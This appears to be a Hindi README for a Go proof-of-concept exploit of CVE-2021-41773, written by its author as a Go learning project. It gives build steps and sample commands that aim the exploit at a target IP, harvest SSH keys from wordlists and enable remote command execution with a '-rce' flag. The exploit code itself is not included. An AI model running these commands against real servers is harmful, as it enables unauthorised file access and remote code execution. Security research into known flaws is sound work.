
इस रिपॉज़िटरी में CVE-2021-41773 के लिए एक Proof-of-Concept शामिल है। इस CVE में LFI और RCE भेद्यता शामिल है।
इस रिपॉजिटरी में CVE-2021-41773 के लिए एक Proof-of-Concept (PoC) शामिल है। यह CVE एक Local File Inclusion (LFI) और Remote Code Execution (RCE) भेद्यता को उजागर करता है।
सुनिश्चित करें कि आपके पास Go संस्करण 1.23.0 स्थापित है।
निम्न कमांड के साथ एक्सप्लॉइट बाइनरी बनाएँ:
go build -o exploit
लक्ष्य IP निर्दिष्ट करें: -i फ्लैग का उपयोग करके लक्ष्य IP पता निर्दिष्ट करें (पोर्ट शामिल करें)। यह आवश्यक है।
./exploit -i 10.0.0.1:8080
SSH वर्डलिस्ट का आकार निर्दिष्ट करें: SSH वर्डलिस्ट का आकार चुनने के लिए -l फ्लैग का उपयोग करें।
विकल्प:
0: छोटा (डिफ़ॉल्ट)1: मध्यम2: बड़ा./exploit -i 10.0.0.1:8080 -l 1
HTTPS सक्षम करें: HTTPS सक्षम करने के लिए -ssl फ्लैग का उपयोग करें (डिफ़ॉल्ट HTTP है)। यह फ्लैग वैकल्पिक है।
./exploit -i 10.0.0.1:8080 -ssl
कस्टम SSH कुंजी वर्डलिस्ट निर्दिष्ट करें: SSH कुंजियों के लिए कस्टम वर्डलिस्ट प्रदान करने हेतु -k फ्लैग का उपयोग करें। यह फ्लैग वैकल्पिक है।
./exploit -i 10.0.0.1:8080 -k /usr/share/wordlist/SecLists/Discovery/Web-Content/quickhits.txt
Remote Code Execution (RCE) सक्षम करें: कमांड को दूरस्थ रूप से निष्पादित करने के लिए -rce फ्लैग का उपयोग करें। यह फ्लैग वैकल्पिक है।
./exploit -i 10.0.0.1:8080 -rce
मैं Golang में कुछ लिखना चाहता था और भाषा सीखना चाहता था।
यह पहला पूर्ण प्रोग्राम है जो मैंने Golang में लिखा है।